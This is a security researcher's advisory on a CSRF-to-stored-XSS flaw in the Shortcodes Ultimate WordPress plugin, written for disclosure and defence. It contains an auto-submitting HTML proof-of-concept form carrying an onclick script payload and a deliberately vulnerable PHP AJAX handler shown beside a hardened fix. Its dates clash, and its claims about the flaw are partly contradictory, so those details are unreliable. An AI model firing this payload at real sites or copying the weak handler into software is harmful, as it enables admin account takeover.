The Shortcodes Ultimate plugin is a widely used WordPress toolkit, enabling site owners to add rich content elements—buttons, tabs, sliders—via simple shortcodes. With over 500,000 active installations, it is a go-to plugin for visual enhancements. However, a critical vulnerability, CVE-2025-7369, allows unauthenticated attackers to exploit a lack of CSRF protection on the plugin’s AJAX preview endpoint. By submitting a specially crafted form, an attacker can store malicious JavaScript in the database that executes in the administrator’s browser, opening the door to a full account-takeover backdoor.
| Field | Value |
|---|---|
| CVE | CVE-2025-7369 |
| Plugin Version | Shortcodes Ultimate <= 7.4.2 |
| Criticality | High |
| All Time | 23 497 655 |
| Active installations | 500 000+ |
| Publicly Published | May 30, 2025 |
| Last Updated | May 30, 2025 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A7: Cross-Site Scripting (XSS) |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-7369 , https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shortcodes-ultimate/shortcodes-ultimate-742-cross-site-request-forgery-to-arbitrary-shortcode-execution |
Timeline
| Date | Event |
|---|---|
| July 8, 2025 | Plugin testing and vulnerability detection in the WP Shortcodes Plugin — Shortcodes Ultimate were completed |
| July 8, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| July 20, 2025 | Registered CVE-2025-7369 |
Discovery of the Vulnerability
During a security review of the AJAX actions in Shortcodes Ultimate, researchers found that the su_generator_preview action can be invoked without any nonce or capability check. The endpoint stores generated shortcode previews in transient storage but does not sanitize the submitted shortcode parameter. Because the action also lacks CSRF protection, an unauthenticated attacker can use a Cross-Site Request Forgery (CSRF) request to persist an XSS payload, which is later rendered in the WordPress admin area when shortcodes are previewed.
Understanding XSS Attacks
Cross-Site Scripting (XSS) remains one of the highest-impact vulnerabilities in web applications. Stored XSS is particularly dangerous because the malicious payload is saved on the server and executed in every user session that views the vulnerable content. In WordPress, similar flaws in plugins like Contact Form 7 and Ninja Forms have been exploited to steal admin cookies, create rogue administrator accounts, or inject stealthy backdoors. CVE-2025-7369 leverages a trusted AJAX endpoint to persist unfiltered shortcode input, demonstrating how missing CSRF and sanitization can lead to serious site compromise.
Exploiting the XSS Vulnerability
To exploit CVE-2025-7369, an attacker needs no session cookie: the request below is accepted by the endpoint without any authentication.

PoC:

```html
<html>
  <body>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="su_generator_preview" />
      <input type="hidden" name="shortcode" value="[su_button url=&quot;#&quot; onclick=&quot;alert(document.domain)&quot;]X[/su_button]" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
The impact of CVE-2025-7369 is severe: any unauthenticated attacker can deliver a CSRF attack that results in stored XSS, targeting site administrators. In real-world scenarios, an attacker could send a phishing link to an admin, trigger the payload, and execute a script to add a backdoor administrator, inject malicious plugin code, or extract sensitive data. E-commerce, membership, and high-traffic sites using Shortcodes Ultimate are especially at risk, as a single successful exploit can lead to total site takeover, data breaches, or defacement.
Recommendations for Improved Security
- Enforce Nonces & Capability Checks: Protect AJAX endpoints like su_generator_preview with check_admin_referer() and current_user_can().
- Sanitize Shortcode Input: Apply wp_kses_post() or esc_html() to the shortcode parameter before storage or rendering.
- Implement CSRF Protection: Reject requests from unauthenticated users or requests missing a valid nonce.
- Audit and Update Plugins: Ensure Shortcodes Ultimate and other plugins are updated to the latest secure versions.
- Use a WAF & CSP: Deploy a Web Application Firewall to block CSRF/XSS patterns and a Content Security Policy to prevent inline script execution.
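As an added illustration (written for this article, not Shortcodes Ultimate's own code), the fragment below places the weak AJAX handler pattern described in the advisory next to a hardened version that applies the recommendations above: no `wp_ajax_nopriv_*` registration, a nonce check, a capability check, and kses filtering. The `example_` function names, the transient key prefix, the nonce action string and the `edit_posts` capability are assumptions chosen for this example. One caveat a reviewer should keep in mind: `wp_kses_post()` filters HTML tags and attributes, not attributes written inside `[...]` shortcode brackets, so the hardened handler also filters the HTML that `do_shortcode()` renders, rather than relying on input filtering alone.

```php
<?php
/**
 * Added example for this article; not code from the Shortcodes Ultimate plugin.
 * All "example_" names, the transient key prefix and the nonce action string
 * are placeholders chosen for the illustration.
 */

// --- Weak pattern (the flaw class the advisory describes) -------------------
// Reachable by unauthenticated callers through wp_ajax_nopriv_*, no nonce,
// no capability check, and the raw POST value is stored and rendered as-is.
add_action( 'wp_ajax_nopriv_example_preview_weak', 'example_preview_weak' );
add_action( 'wp_ajax_example_preview_weak', 'example_preview_weak' );
function example_preview_weak() {
    $shortcode = isset( $_POST['shortcode'] ) ? wp_unslash( $_POST['shortcode'] ) : '';
    set_transient( 'example_preview_' . md5( $shortcode ), $shortcode, HOUR_IN_SECONDS );
    echo do_shortcode( $shortcode ); // unfiltered output reaches the admin's browser
    wp_die();
}

// --- Hardened pattern -------------------------------------------------------
// 1. Only wp_ajax_* is registered: admin-ajax.php never dispatches this action
//    for visitors without a logged-in session.
add_action( 'wp_ajax_example_preview_secure', 'example_preview_secure' );

function example_preview_secure() {
    // 2. CSRF: the request must carry the nonce printed into the admin page by
    //    example_preview_nonce_field(). check_ajax_referer() ends the request
    //    with "-1" when the nonce is missing or stale; check_admin_referer()
    //    (named in the text) performs the same check for non-AJAX forms.
    check_ajax_referer( 'example_preview_nonce', 'nonce' );

    // 3. Authorization: a valid session is not enough; require a capability
    //    appropriate to content editing (assumed here: edit_posts).
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    // 4. Sanitize the input before it is persisted. wp_kses_post() removes
    //    disallowed tags and on* event handlers from any HTML in the value.
    $raw       = isset( $_POST['shortcode'] ) ? wp_unslash( $_POST['shortcode'] ) : '';
    $shortcode = wp_kses_post( $raw );

    // Store only the sanitized copy (the key prefix is an example value).
    set_transient( 'example_preview_' . md5( $shortcode ), $shortcode, HOUR_IN_SECONDS );

    // 5. Sanitize the rendered output too: attributes inside shortcode brackets
    //    are not HTML and pass through kses untouched, but once do_shortcode()
    //    turns them into real tag attributes kses can strip the dangerous ones.
    $html = wp_kses_post( do_shortcode( $shortcode ) );

    wp_send_json_success( array( 'html' => $html ) );
}

// Emits the hidden nonce input the admin-side form or script sends back as
// the "nonce" field checked above.
function example_preview_nonce_field() {
    wp_nonce_field( 'example_preview_nonce', 'nonce' );
}
```

The request the PoC form sends has no `nonce` field and no session, so against the hardened handler it fails at step 1 (the `nopriv` route does not exist) and, even for a logged-in victim, at step 2 (the nonce is absent). Kses on both input and rendered output means a shortcode attribute such as `onclick` cannot survive into the preview HTML regardless of how the shortcode itself maps attributes to tags.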
To prevent this type of attack, the vendor applied the prevention methods we recommended.
By taking proactive measures to address Stored XSS vulnerabilities like CVE-2025-7369, WordPress website owners can strengthen their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
Dmitrii I.